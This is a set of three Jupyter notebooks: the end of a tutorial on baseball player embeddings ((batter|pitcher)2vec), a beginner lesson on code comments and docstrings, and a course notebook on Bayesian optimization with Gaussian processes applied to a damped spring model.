:param name: :param data: :param latent_vecs: :param player_names: :param k: :return: """ player_index = np.where(data["name"] == name)[0] player_latent = latent_vecs[player_index] print(player_latent[0]) # distances = list(np.linalg.norm(latent_vecs - player_latent, axis = 1)) distances = 1 - np.dot(latent_vecs, player_latent.T).flatten() / (np.linalg.norm(latent_vecs, axis = 1) * np.linalg.norm(player_latent)) distances_and_ids = list(zip(player_names, distances)) distances_and_ids.sort(key = lambda x: x[1]) return distances_and_ids[1:1 + k] data_files = ["batters_latent.csv", "pitchers_latent.csv"] player_df = {} player_names = {} player_ids = {} latent_vecs = {} for player_type in ["batter", "pitcher"]: data_file = "{0}s_latent.csv".format(player_type) player_df[player_type] = pd.read_csv(data_file) player_ids[player_type] = list(player_df[player_type]["player_id"]) player_names[player_type] = list(player_df[player_type]["name"]) latent_vecs[player_type] = np.array(player_df[player_type].iloc[:, 2:]) for batter in ["Mike Trout", "Dee Gordon"]: print(batter) print(get_nearest_neighbors(batter, player_df["batter"], latent_vecs["batter"], player_names["batter"])) print() for pitcher in ["Clayton Kershaw", "Aroldis Chapman", "Jake Arrieta", "Felix Hernandez"]: print(pitcher) print(get_nearest_neighbors(pitcher, player_df["pitcher"], latent_vecs["pitcher"], player_names["pitcher"])) print() ``` At a first glance, the nearest neighbors produced by the embedding do seem to support baseball intuition. Both Mike Trout and Paul Goldschmidt are known for their [rare blend of speed and power](https://sports.vice.com/en_us/article/paul-goldschmidt-might-really-be-this-good). Like [Dee Gordon](http://ftw.usatoday.com/2015/06/dee-gordon-miami-marlins-inside-park-home-run), Ichiro Suzuki [has a knack for being able to get on base](http://www.fangraphs.com/blogs/dee-gordon-has-been-going-full-ichiro/). 
Zack Greinke's presence among Clayton Kershaw's nearest neighbors is interesting as they are considered [one of the best pitching duos of all time](https://www.si.com/cauldron/2015/09/17/clayton-kershaw-zack-greinke-cy-young-mlb). The similarities between Craig Stammen and Kershaw are not obvious to my ignorant baseball eye, but we would expect a method like <code>(batter|pitcher)2vec</code> (if effective) to occasionally discover surprising neighbors or else it wouldn't be particularly useful. Aroldis Chapman's nearest neighbors are fairly unsurprising with [Craig Kimbrel](https://www.scientificamerican.com/article/the-documentary-fastball-tosses-some-physics-at-fans/) and [Andrew Miller](http://www.cbssports.com/mlb/news/world-series-from-teammates-to-foes-indians-andrew-miller-cubs-aroldis-chapman-meet-again/) both being elite relief pitchers. When clustering players using common MLB stats (e.g., HRs, RBIs), Mike Trout's ten nearest neighbors for the 2015 season are: Bryce Harper, Julio Daniel Martinez, Andrew McCutchen, Justin Upton, Matt Carpenter, Joey Votto, Curtis Granderson, Kris Bryant, Chris Davis, and Brian Dozier (R code [here](https://github.com/airalcorn2/batter-pitcher-2vec/blob/master/raw_stats_neighbors.R)). So there is some overlap between the two neighborhood methods, but, intriguingly, the nearest neighbor from each method is not found in the neighborhood of the other method. Similarly, Ichiro isn't among Dee Gordon's ten nearest neighbors when clustering on standard MLB stats. ## Opposite-handed Doppelgängers Another fun thing to try is analogies. As I mentioned at the beginning of this notebook, word embeddings often contain interesting analogy properties. [Erik Erlandson](https://www.linkedin.com/in/erikerlandson), a colleague of mine at Red Hat, suggested I use average vectors for right-handed and left-handed batters to generate opposite-handed doppelgängers for different players. Let's see what that looks like. 
```
def get_opposite_hand(name, batting_hand, df, latent_vecs, player_names, k = 10):
    """Find the player's opposite batting hand doppelgängers.

    Uses the word2vec-style analogy trick: subtract the average vector of the
    player's own batting hand and add the average vector of the opposite hand,
    then rank all players by cosine distance to the shifted vector.

    :param name: player name to look up in df["name"]
    :param batting_hand: the player's own batting hand, "R" or "L"
        (NOTE(review): switch hitters, "B", fall into the else branch and are
        treated like left-handed batters — confirm this is intended)
    :param df: DataFrame with player metadata, aligned with latent_vecs rows
    :param latent_vecs: matrix of latent player vectors
    :param player_names: list of player names, aligned with latent_vecs rows
    :param k: number of doppelgängers to return
    :return: list of (name, cosine distance) tuples, closest first
    """
    player_index = np.where(df["name"] == name)[0]
    player_latent = latent_vecs[player_index]
    if batting_hand == "R":
        opposite_hand = player_latent - average_batters["R"] + average_batters["L"]
    else:
        opposite_hand = player_latent - average_batters["L"] + average_batters["R"]
    # Cosine distance between every player vector and the shifted vector.
    # distances = list(np.linalg.norm(latent_vecs - opposite_hand, axis = 1))
    distances = 1 - np.dot(latent_vecs, opposite_hand.T).flatten() / (np.linalg.norm(latent_vecs, axis = 1) * np.linalg.norm(opposite_hand))
    distances_and_ids = list(zip(player_names, distances))
    distances_and_ids.sort(key = lambda x: x[1])
    return distances_and_ids[:k]

# Generate average vectors for each batting hand.
average_batters = {"R": [], "L": [], "B": []}
for player_id in player_data:
    hand = player_data[player_id]["batting_hand"]
    batter_index = np.where(player_df["batter"]["player_id"] == player_id)[0]
    batter_latent = latent_vecs["batter"][batter_index]
    # Only batters that actually appear in the latent matrix contribute.
    if len(batter_latent) > 0:
        average_batters[hand] += [batter_latent]

for batting_hand in average_batters:
    average_batters[batting_hand] = np.array(average_batters[batting_hand]).mean(axis = 0)

# Get opposite-handed doppelgängers.
print("Mike Trout")
print(get_opposite_hand("Mike Trout", "R", player_df["batter"], latent_vecs["batter"], player_names["batter"]))
print()
print("Dee Gordon")
print(get_opposite_hand("Dee Gordon", "L", player_df["batter"], latent_vecs["batter"], player_names["batter"]))
print()
```
Bryce Harper's presence among Mike Trout's left-handed doppelgängers [is particularly satisfying](http://www.sportingnews.com/mlb/news/sn50-2016-best-baseball-players-mike-trout-bryce-harper/mk3kmorbiyhr1f7onb7t5pehq).
As for Dee Gordon's right-handed doppelgängers, Tyler Saladino is known for "[legging 'em out](http://www.fangraphs.com/fantasy/all-aboard-the-tyler-saladino-hype-train/)". # Modeling Previously Unseen At-Bat Matchups Measuring how well the <code>(batter|pitcher)2vec</code> representations predict outcome distributions for unseen matchups is the ultimate test of whether the representations are capturing anything meaningful about players. To test the model, we'll look at matchups from the 2016 season that were not seen in the training set. ``` matchup_counts = {} outcome_counts = {} for sample in data[test_year]: batter = sample["batter"] pitcher = sample["pitcher"] matchup = "{0}_{1}".format(batter, pitcher) if batter in categories["batter"] and pitcher in categories["pitcher"] and matchup not in matchups: matchup_counts[matchup] = matchup_counts.get(matchup, 0) + 1 if matchup not in outcome_counts: outcome_counts[matchup] = {} outcome_counts[matchup][outcome] = outcome_counts[matchup].get(outcome, 0) + 1 matchup_counts = list(matchup_counts.items()) matchup_counts.sort(key = lambda x: -x[1]) ``` To determine the effectiveness of <code>(batter|pitcher)2vec</code>, we need something to first establish a baseline. We'll use a naïve prediction strategy to fill that role. For any given batter, we'll define their expected outcome distribution as: $$p(o_i|b_j)=\frac{c_{i,j} + r_i}{\sum_{k=1}^{K} c_{j,k} + 1}$$ where $o_i$ denotes the outcome indexed by $i$, $c_{i,j}$ is the number of times the player indexed by $j$ had an at-bat resulting in the outcome indexed by $i$ in the training data, $r_i$ is the proportion of all at-bats that resulted in the outcome indexed by $i$ in the training data, and $K$ is the number of possible outcomes. Essentialy, the procedure adds one at-bat to each batter, but distributes the mass of that single bat across all outcomes based on data from all batters. You can think of $r_i$ as a type of "prior" or smoothing factor. 
$p(o_i|p_j)$ will be similarly defined. Finally, we'll define the expected outcome distribution for a given batter/pitcher matchup as: $$p(o_i|b_j,p_k) = \frac{p(o_i|b_j) + p(o_i|p_k)}{2}$$ ``` def get_past_outcome_counts(train_years, data, test_players, player_type): """Retrieve past outcome counts for a given player in the training set. :param train_years: :param data: :param test_players: :param player_type: """ past_outcome_counts = {} for year in train_years: for sample in data[year]: player = sample[player_type] if player in test_players: outcome = sample["outcome"] if player not in past_outcome_counts: past_outcome_counts[player] = {} past_outcome_counts[player][outcome] = past_outcome_counts[player].get(outcome, 0) + 1 return past_outcome_counts cutoff = 0 total_above = sum(1 for matchup_count in matchup_counts if matchup_count[1] >= cutoff) TOP_MATCHUPS = total_above print("Total Matchups: {0}".format(TOP_MATCHUPS)) test_batters = {matchup[0].split("_")[0] for matchup in matchup_counts[:TOP_MATCHUPS]} test_pitchers = {matchup[0].split("_")[1] for matchup in matchup_counts[:TOP_MATCHUPS]} test_matchups = {matchup[0] for matchup in matchup_counts[:TOP_MATCHUPS]} past_batter_outcome_counts = get_past_outcome_counts(train_years, data, test_batters, "batter") past_pitcher_outcome_counts = get_past_outcome_counts(train_years, data, test_pitchers, "pitcher") # Get total outcome counts from training data. train_outcome_counts = {} for year in train_years: for sample in data[year]: outcome = sample["outcome"] train_outcome_counts[outcome] = train_outcome_counts.get(outcome, 0) + 1 # Convert total outcome counts into a probability distribution. 
total_outcomes = sum(train_outcome_counts.values()) for outcome in train_outcome_counts: train_outcome_counts[outcome] /= total_outcomes past_batter_probs = {} for batter in test_batters: past_batter_outcome_total = sum(past_batter_outcome_counts[batter].values()) past_batter_probs[batter] = {} for outcome in train_outcome_counts: past_batter_probs[batter][outcome] = (past_batter_outcome_counts[batter].get(outcome, 0) + train_outcome_counts[outcome]) / (past_batter_outcome_total + 1) past_pitcher_probs = {} for pitcher in test_pitchers: past_pitcher_outcome_total = sum(past_pitcher_outcome_counts[pitcher].values()) past_pitcher_probs[pitcher] = {} for outcome in train_outcome_counts: past_pitcher_probs[pitcher][outcome] = (past_pitcher_outcome_counts[pitcher].get(outcome, 0) + train_outcome_counts[outcome]) / (past_pitcher_outcome_total + 1) ``` We can then calculate the log loss of this naïve approach on unseen matchups. ``` from statsmodels.stats.weightstats import ttest_ind test_data_sets = {"batter": [], "pitcher": [], "outcome": []} naive_losses = [] for sample in data[test_year]: batter = sample["batter"] pitcher = sample["pitcher"] matchup = "{0}_{1}".format(batter, pitcher) if matchup not in test_matchups: continue outcome = sample["outcome"] past_batter_prob = past_batter_probs[batter][outcome] past_pitcher_prob = past_pitcher_probs[pitcher][outcome] naive_prob = (past_batter_prob + past_pitcher_prob) / 2 naive_loss = -np.log(naive_prob) naive_losses.append(naive_loss) for column in sample: value = sample[column] value_index = category_to_int[column][value] test_data_sets[column].append([value_index]) avg_naive_loss = sum(naive_losses) / len(naive_losses) print("Naïve Loss: {0:.4f}".format(avg_naive_loss)) print(len(naive_losses)) ``` And we can now see how <code>(batter|pitcher)2vec</code> compares. 
```
# Evaluate (batter|pitcher)2vec on the held-out, previously unseen matchups.
for column in ["batter", "pitcher"]:
    test_data_sets[column] = np.array(test_data_sets[column])

X_list = [test_data_sets["batter"], test_data_sets["pitcher"]]
y = test_data_sets["outcome"]
preds = model.predict(X_list)
# result = model.evaluate(X_list, np_utils.to_categorical(np.array(test_data_sets["outcome"]), NUM_OUTCOMES), verbose = 0)
# print(result)
net_losses = []
for i in range(preds.shape[0]):
    # Negative log-likelihood of the outcome that actually occurred.
    net_loss = -np.log(preds[i][y[i]][0])
    net_losses.append(net_loss)

avg_net_loss = sum(net_losses) / len(net_losses)
print("(batter|pitcher)2vec: {0:.4f}".format(avg_net_loss))
print(len(net_losses))
print("{0:.2f}% fewer bits on average.".format(100 * (1 - avg_net_loss / avg_naive_loss)))
print(ttest_ind(net_losses, naive_losses, alternative = "smaller"))
```
As you can see, <code>(batter|pitcher)2vec</code> is significantly better at modeling outcome distributions for unseen batter/pitcher matchups than the naïve baseline. But is an improvement of only 0.94% over the baseline particularly impressive? Let's see how our logistic regression model fares.
```
if TRAIN_ALT:
    # Same evaluation as above, but for the one-hot logistic regression baseline.
    X_batters = csr_matrix(np_utils.to_categorical(np.array(test_data_sets["batter"]), NUM_BATTERS))
    X_pitchers = csr_matrix(np_utils.to_categorical(np.array(test_data_sets["pitcher"]), NUM_PITCHERS))
    X = hstack([X_batters, X_pitchers])
    preds = alt_model.predict_proba(X)

    lr_losses = []
    for i in range(preds.shape[0]):
        lr_loss = -np.log(preds[i][y[i]][0])
        lr_losses.append(lr_loss)

    avg_lr_loss = sum(lr_losses) / len(lr_losses)
    print("Logistic Regression: {0:.4f}".format(avg_lr_loss))
    print(len(lr_losses))
    print("{0:.2f}% fewer bits on average.".format(100 * (1 - avg_lr_loss / avg_naive_loss)))
    print(ttest_ind(lr_losses, naive_losses, alternative = "smaller"))
```
The logistic regression model actually performs slightly worse than our naïve approach! The neural net strategy seems to be a promising one.
github_jupyter
# Functions - Best practices In this notebook we will discuss a bit about what are the best practices of documenting and writing functions. These topics won't be graded but they will give you a general idea of what to do once you start developing in real-world. They are also usable throughout any programming language. The following are just initial ideas for you to think about and use during the course. Commenting, what to comment and how to comment are open-ended discussions and different people have different opinions. Just make sure, pretty please 🙏, that you comment and document what you don't know. I can't stress this enough, **You don't know how many times people had to refactor code and redo everything just because they forgot what it did.** ## Comments Everyone likes comments and everyone knows that they are important. Leaving comments in the code allows others to understand our thought process and allows you to return to the code, after some days, and still understand what the hell you were trying to do at that time. 
I know it sounds troublesome and you think that you will remember what you were doing, but trust me when I say this: ### You won't remember everything so might as well add some comments Initially, and after reading all these warnings your thought process will likely be ![Comments everywhere](assets/comments-comments-everywhere.jpeg) But **be careful!** If you start commenting everything like in the function `adding_function` below, most of your comments will feel like noise and the important comments will be lost in the spam ``` # Example of spammy comments def adding_function(int_1, int_2): # This function adds two integers -> as the name and parameters already suggest, useless comment # Adding variables a+b -> useless as well, any person that sees this knows that it's an adding operation result = int_1 + int_2 #returns the result of the sum made above -> we know already 😂 return result # In this case the code is very self-descriptive, so it may not need any comments really ``` When taking comments into consideration, and this will be hard at first, you need to find balance between over-commenting and commenting what is needed. Your variables should also be descriptive of what you are trying to achieve ``` import re def sanitize_string(string): if type(string) is not str: # No need for a comment, you understand by the print and condition what is happening here print("Not a string!") return # Wow, what the *!F$% is this next piece of code doing? # -> Maybe I should document this for other people and myself in the future! # regex, removes any character that is not a space, number or letter clean_string = re.sub('[^A-Za-z0-9 ]+', '', string) # this you probably know, but if you don't -> comment! # It lowercases the string return clean_string.lower() weird_string = "^*ººHe'?llo Woç.,-rld!" 
sanitize_string(weird_string)
sanitize_string(2)
```
<div> <img alt="perfectly balanced", src="./assets/perfectly_balanced.jpeg" width="400"> </div>

Commenting is completely up to the programmer. It's **your responsibility** to know what you are doing and to make sure that the people who are reading your code understand what you were doing at the time of writing!

* Use clear, descriptive variables!
* Use clear, descriptive function names - `function_one` doesn't add any information on what it does!
* If you are making any assumption inside the code - document it!
* If you are fixing an edge case (i.e., a very specific problem/condition of your solution) - document it!
* If you feel that it's not clear what you have done - leave a comment!
* Don't add comments to every line of the program describing every single thing you do; most of them probably won't add any value

## Docstrings

Python documentation strings - docstrings - are a convenient and consistent way of writing a description for any kind of function, class or method (the last two you will learn later on). There are several ways of writing docstrings; I'll introduce you to a specific one, but in general they all revolve around the same idea, which is - **document and comment your function!** Usually every function should state its purpose and give a general description of what it receives (parameters) and what it returns. Moreover, some IDEs - like VSCode, not Jupyter - already come with this option, so usually if you write `"""` and press Enter after a function it will create a docstring for you to fill in. Example shown below:

<div> <img alt="docstring_1", src="./assets/docstring_01.png" width="600"> </div>

After pressing Enter this is what shows up!

<div> <img alt="docstring_2", src="./assets/docstring_02.png" width="600"> </div>

Pretty cool right?! Some IDEs already give you all the tools to employ docstrings so there is really no excuse! 
**Note:** You may need to activate this feature on your IDE. For VSCode you might need to install this plugin: https://marketplace.visualstudio.com/items?itemName=njpwerner.autodocstring -> check its example for a detailed video on how to do this Using function `sanitize_string` as an example: ``` def sanitize_string(string): """ Cleans a string by removing any characters that are not spaces, numbers or letters. returns it in lowercase :param string: string to be cleaned :return: sanitized string """ if type(string) is not str: print("Not a string!") return # removes any character that is not a space, number or letter clean_string = re.sub('[^A-Za-z0-9 ]+', '', string) return clean_string.lower() ``` In conclusion, docstrings are a really good way of documenting every function you use on a program! Keeping it constant throughout all functions leads to a very organised commenting. Moreover (and this is the fun interesting part!), there are tools - like [Sphinx](https://www.sphinx-doc.org/en/master/) - that you can use that transform all these docstring comments into a web documentation page automatically! For a real life example, the [Numpy documentation page](https://numpy.org/doc/stable/reference/) (a really valuable tool for data scientists!) was created automatically by using Sphinx with docstrings! There are many many more stuff that can be done here but I don't want to kill you with information overload. If you focus on these two topics it will be of great help to you in the future! Thank you for reading this, have an appreciation meme! <div> <img alt="love_python", src="./assets/program_python.png" width="400"> </div>
github_jupyter
# Bayesian optimization *Selected Topics in Mathematical Optimization: 2017-2018* **Michiel Stock** ([email](michiel.stock@ugent.be)) ![](Figures/logo.png) ``` import numpy as np import sympy as sp sp.init_printing() from numpy import sin, exp, cos from sklearn.preprocessing import normalize from scipy.stats import norm from scipy.integrate import odeint import matplotlib.pyplot as plt from sklearn.gaussian_process import GaussianProcessRegressor %matplotlib inline np.random.seed(3) blue = '#264653' green = '#2a9d8f' yellow = '#e9c46a' orange = '#f4a261' red = '#e76f51' black = '#50514F' ``` ## Motivation **Goal**: Solve $$ \mathbf{x}^* = \text{arg min}_\mathbf{x}\, f(\mathbf{x}) $$ when every evaluation of $f(\mathbf{x})$ is *expensive*. **Example 1**: *Dark art* of selecting the right hyperparameters for a machine learning model. Ditto for many optimization methods! ![Machine learning models often have many hyperparameters.](Figures/ANN_hyperpars.png) **Example 2**: *Model calibration* to find the right parameters or structure of a mechanistic model. **Example 3**: Experimentation for improvement (drug design, product development, new cooking recipes...): 1. Gather data 2. Make model 3. Select new experiments for testing in the lab 4. Repeat ## Leading example Damped spring mass system. ![Spring with mass, damped](Figures/spring.png) Model: $$ m\ddot{y}(t) + \gamma \dot{y}(t) + k y(t) = 0\,, $$ with: - $m$: the mass (1 kg) - $\gamma$: friction parameter (unknown) - $k$: the spring constant (unknown) Can be simulated (here exact solution known). 
```
def damped_oscillator(t_vals, g, k, m=1, sigma=0, x0=1):
    """Exact solution of the damped spring-mass system m*y'' + g*y' + k*y = 0.

    Initial conditions: y(0) = x0, y'(0) = 0.

    :param t_vals: array of time points at which to evaluate y(t)
    :param g: friction (damping) parameter gamma
    :param k: spring constant
    :param m: mass (default 1 kg)
    :param sigma: standard deviation of additive Gaussian measurement noise
    :param x0: initial displacement
    :return: array of y(t) values at t_vals (noisy if sigma > 0)
    """
    # Roots of the characteristic equation m*l**2 + g*l + k = 0:
    #   l = (-g +/- sqrt(g**2 - 4*k*m)) / (2*m)
    if g**2 > 4*k*m:
        # Overdamped: two distinct real roots.
        # BUGFIX: the numerator is -g, not -g**2 (consistent with the
        # -g / (2*m) used in the other two branches below).
        l1 = (-g + (g**2 - 4*k*m)**0.5) / (2 * m)
        l2 = (-g - (g**2 - 4*k*m)**0.5) / (2 * m)
        c1, c2 = np.linalg.solve([[1, 1], [l1, l2]], [[x0], [0]]).flatten()
        y_vals = c1 * exp(t_vals * l1) + c2 * exp(t_vals * l2)
    elif g**2 == 4*k*m:
        # Critically damped: one repeated real root.
        l1 = - g / (2 * m)
        c1, c2 = np.linalg.solve([[1, 0], [l1, 1]], [[x0], [0]]).flatten()
        y_vals = c1 * exp(t_vals * l1) + c2 * t_vals * exp(t_vals * l1)
    else:
        # Underdamped: complex conjugate roots alpha +/- i*beta.
        alpha = - g / (2 * m)
        beta = (4 * m * k - g**2)**0.5 / (2 * m)
        c1, c2 = np.linalg.solve([[1, 0], [alpha, beta]], [[x0], [0]]).flatten()
        y_vals = exp(alpha * t_vals) * (c1 * cos(beta * t_vals) + c2 * sin(beta * t_vals))
    return y_vals + np.random.randn(len(t_vals)) * sigma

fig, ax = plt.subplots()
t_vals = np.linspace(0, 5, num = 1000)
for g in np.logspace(-2, 2, num=4):
    for k in np.logspace(-2, 2, num=4):
        y_vals = damped_oscillator(t_vals, g=g, k=k)
        ax.plot(t_vals, y_vals)
ax.set_xlabel('$t$')
ax.set_ylabel('$y(t)$')
```
## Finding the best model parameters

We perform some experiments, and have 20 noisy measurements.
```
# parameters
m=1  # known
kstar=7  # unknown
gstar=1  # unknown

# noisy observations
t_meas = np.linspace(0, 5, num=20)
y_obs = damped_oscillator(t_meas, g=gstar, k=kstar, m=m, sigma=0.15)

# true function
t_vals = np.linspace(0, 5, num = 1000)
y_vals = damped_oscillator(t_vals, g=gstar, k=kstar, m=m)

fig, ax = plt.subplots()
ax.plot(t_vals, y_vals, c=blue, label='unknown parametrized function')
ax.scatter(t_meas, y_obs, c=red, label='noisy observations')
ax.set_xlabel('$t$')
ax.set_ylabel('$y(t)$')
ax.legend(loc=0)
```
For a given $\gamma$ and $k$, compute the mean squared error:

$$ MSE(\gamma, k) = \frac{1}{20} \sum_{i=1}^{20} (y(t_i) - \hat{y}(t_i, \gamma, k))^2 $$

Best parameters obtained by:

$$ \gamma^*, k^* = \text{arg min}_{\gamma, k} MSE(\gamma, k) $$
```
def get_mse(g, k):
    """ Computes the mean squared error for a given gamma and k. 
""" y_sim = damped_oscillator(t_meas, g=g, k=k) return np.log10(np.mean((y_sim - y_obs)**2)) ``` Since gamma and kappa are positive values for which we do not know the scale, it makes sense to work with the logarithm of these paramaters. ``` g_vals = np.logspace(-2, 2, num=100) k_vals = np.logspace(-2, 2, num=100) mse_pars = np.zeros((len(g_vals), len(k_vals))) for i, g in enumerate(g_vals): for j, k in enumerate(k_vals): mse_pars[i, j] = get_mse(g=g, k=k) ``` Because the example is simple, we can search the complete space for the best parameters. ``` G, K = np.meshgrid(g_vals, k_vals) fig, ax = plt.subplots(figsize=(6, 6)) ax.contourf(K, G, mse_pars.T) ax.set_xlabel('$k$') ax.set_ylabel('$g$') ax.scatter(kstar, gstar, c='y') ax.loglog() ``` In general, it is *not* possible to sample the whole parameter space. If the model is really complex, even a single evalutation might be expensive! What if we only can test a limited number of parameter combinations? ## Grid search vs. random search ``` param_grid = np.array([[g, k] for k in np.logspace(-1.5, 1.5, num=4) for g in np.logspace(-1.5, 1.5, num=4)]) param_random = 10**np.random.uniform(-2, 2, size=(16, 2)) fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(12, 5)) ax0.scatter(param_grid[:,0], param_grid[:,1], c=red, label='samples') ax0.set_title('Grid') ax1.scatter(param_random[:,0], param_random[:,1], c=red, label='samples') ax1.set_title('Random') for ax in (ax1, ax0): ax.scatter(kstar, gstar, c=yellow, label='optimal parameters') ax.loglog() ax.set_xlabel('$k$') ax.set_ylabel('$\gamma$') ax.set_ylim([1e-2, 1e2]) ax.set_xlim([1e-2, 1e2]) ax.legend(loc=0) ``` > **Don't use grid search!** ``` # evaluate instances simulated_parameters = param_random #simulated_parameters = param_grid mse_obs = np.array([get_mse(g=g, k=k) for g, k in simulated_parameters]) mse_obs ``` ## Surrogate modelling with Gaussian processes Predict the performance of *new* parameter combinations using a surrogate model. 
(From here on onwards, $\mathbf{x}\in\mathcal{X}$ is used to denote the parameters) Gaussian process: - learn a function of the form $f: \mathcal{X}\rightarrow \mathbb{R}$ - nonlinear model, uses a positive-definite covariance function $K:\mathcal{X} \times \mathcal{X} \rightarrow \mathbb{R}$ - Bayesian method: prior on function and use Bayes' theorem to condition on observed data - can be updated if more date becomes available (online learning) - fully probabilistic, in theory no tuning! The model return for a given instance $\mathcal{x}$: - $\mu(\mathbf{x})$: expected value; - $\sigma(\mathbf{x})$: standard deviation. For a brief, but well-founded overview of Gaussian processes, consult the [chapter](http://www.inference.org.uk/mackay/gpB.pdf) in the book of MacKay. ``` gaussian_process = GaussianProcessRegressor(alpha=1e-3) # take logarithm of MSE and the parameters to obtain better scaling gaussian_process.fit(np.log10(simulated_parameters), mse_obs) instance = np.log10([[3, 0.1]]) mu, sigma = gaussian_process.predict(instance, return_std=True) print('Predicted MSE: {} ({})'.format(mu[0], sigma[0])) ``` Explore whole parameter space. ``` mu_mse = np.zeros_like(mse_pars) std_mse = np.zeros_like(mse_pars) for i, g in enumerate(g_vals): for j, k in enumerate(k_vals): instance = np.log10([[g, k]]) mu, sigma = gaussian_process.predict(instance, return_std=True) mu_mse[i, j] = mu[:] std_mse[i, j] = sigma[:] fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(12, 5)) ax0.contourf(K, G, mu_mse.T) ax0.set_title('Estimated MSE') ax1.contourf(K, G, std_mse.T) ax1.set_title('Std MSE') for ax in (ax0, ax1): ax.set_xlabel('$k$') ax.set_ylabel('$\gamma$') ax.loglog() ax.scatter(kstar, gstar, c=yellow) ax.scatter(simulated_parameters[:,0], simulated_parameters[:,1], c=red) ``` Slice for $k=1$. 
def calculate_gamma(mu, sigma, fbest):
    """Standardized improvement gamma(x) = (f_best - mu(x)) / sigma(x)."""
    return (fbest - mu) / sigma


def probability_improvement(mu, sigma, fbest=None):
    """Probability-of-improvement acquisition: PI(x) = Phi(gamma(x)).

    Parameters
    ----------
    mu, sigma : float or array-like
        Posterior mean and standard deviation of the surrogate model.
    fbest : float, optional
        Best (lowest) objective value observed so far.  If omitted, the
        current minimum of the global ``mse_obs`` is used.  Evaluating
        this at call time (instead of as an early-bound default, which is
        frozen at definition time) keeps the acquisition up to date after
        new observations are added.

    Returns
    -------
    float or ndarray
        Probability that f(x) improves on ``fbest``.
    """
    if fbest is None:
        fbest = np.min(mse_obs)
    gamma_values = calculate_gamma(mu, sigma, fbest)
    return norm.cdf(gamma_values)
""" gamma_values = calculate_gamma(mu, sigma, fbest) return sigma * (gamma_values * norm.cdf(gamma_values) + norm.pdf(gamma_values)) ``` **GP Lower Confidence Limit** $$ a_\text{LCB} = \mu(\mathbf{x}) - \kappa \sigma(\mathbf{x})\,, $$ with $\kappa$ a parameter determining the tightness of the bound. ``` def lower_confidence_bound(mu, sigma, kappa=2): """ Calculates lower confidence bound. Made negative: maximizing acquisition function! """ return - (mu - kappa * sigma) def plot_acquisitions(): fig, (ax0, ax1, ax2, ax3) = plt.subplots(nrows=4, sharex=True, figsize=(8, 10)) # plot mu and sigma ax0.plot(k_slice[:,0], mu, c=green, label='expected value') ax0.plot(k_slice[:,0], mu-2*sigma, c=orange, ls='--', label='95% interval') ax0.plot(k_slice[:,0], mu+2*sigma, c=orange, ls='--') ax0.semilogx() ax0.set_ylabel('predicted\nMSE') # plot information gains ax1.plot(k_slice[:,0], probability_improvement(mu, sigma), c=blue, label='PI') ax1.set_ylabel('PI') ax2.plot(k_slice[:,0], expected_improvement(mu, sigma), c=blue, label='EI') ax2.set_ylabel('EI') ax3.plot(k_slice[:,0], lower_confidence_bound(mu, sigma), c=blue, label='LCB') ax3.set_ylabel('LCB') ax3.set_xlabel('$\gamma$') plot_acquisitions() PI = np.zeros_like(mse_pars) EI = np.zeros_like(mse_pars) LCB = np.zeros_like(mse_pars) for i, g in enumerate(g_vals): for j, k in enumerate(k_vals): instance = np.log10([[g, k]]) mu, sigma = gaussian_process.predict(instance, return_std=True) mu = mu[:] sigma = sigma[:] PI[i,j] = probability_improvement(mu, sigma) EI[i,j] = expected_improvement(mu, sigma) LCB[i,j] = lower_confidence_bound(mu, sigma) def show_acquisition_contourf(ax0, ax1, ax2): ax0.contourf(K, G, PI.T) ax0.set_title('PI') ax0.scatter(simulated_parameters[:,0], simulated_parameters[:,1], c=red) ax1.contourf(K, G, EI.T) ax1.set_title('EI') ax1.scatter(simulated_parameters[:,0], simulated_parameters[:,1], c=red) ax2.contourf(K, G, LCB.T) ax2.set_title('LCB') ax2.scatter(simulated_parameters[:,0], 
simulated_parameters[:,1], c=red) for ax in (ax0, ax1, ax2): ax.set_xlabel('$k$') ax.set_ylabel('$\gamma$') ax.loglog() ax.scatter(kstar, gstar, c=yellow) ax.scatter(simulated_parameters[:,0], simulated_parameters[:,1], c=red) fig, (ax0, ax1, ax2) = plt.subplots(ncols=3, figsize=(13, 5)) show_acquisition_contourf(ax0, ax1, ax2) ``` Use Gaussian process model to select new points to evaluate! ## Gradient-based optimization for finding next point If we assume that evaluating points from the Gaussian process surogate model is much cheaper than evaluating the true function, we can either use an exhaustive sampling of this space (if the dimension is not too large) or use a gradient-based optimizer to find a maximizer of the acquisition function. ``` from scipy.optimize import minimize neg_acquisition = lambda parameter : -probability_improvement(*gaussian_process.predict(parameter.reshape((1,2)), return_std=True)) # start from best previous point f0, x0 = min(zip(mse_obs, simulated_parameters)) result = minimize(neg_acquisition, x0=x0, bounds=[(-2, 2), (-2, 2)]) xnew = result.x result print('New parameters to try: {}'.format(10**xnew)) ``` ## Concluding remarks **Remark 1** Gaussian process model usually continuous and differentiable w.r.t. $\mathbf{x}$: - $\nabla \mu(\mathbf{x})$ - $\nabla \sigma(\mathbf{x})$ gradient-based optimization! **Ramark 2** Use of correlation between instances: ``` param_random = 10**np.random.uniform(-2, 2, size=(20, 2)) mu, cov = gaussian_process.predict(np.log10(param_random), return_cov=True) fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(8, 4)) ax0.plot(10**mu) ax0.set_ylabel('estimated MSE') ax1.imshow(cov, interpolation='nearest', cmap='hot') ax1.set_title('Covariance') ``` Use coviance to select a *set* of informative instances to explore! 
**Remark 3** Some instances will differ in execution times: - regularization size (machine learning) - learning rate (machine learning) - number of parameters - grid size approximation (mechanistic modelling) Better optimize *expected improvement per second*. Use a model of expected duration (second Gaussian process). ## References Snoek, J., Larochelle, H., Adams, R. '*Practical Bayesian optimization of machine learning algorithms*'. Advances in Neural Information Processing Systems (2012) Rasmussen, C., Williams, C., '*Gaussian Processes for Machine Learning*'. The MIT Press (2006)
github_jupyter
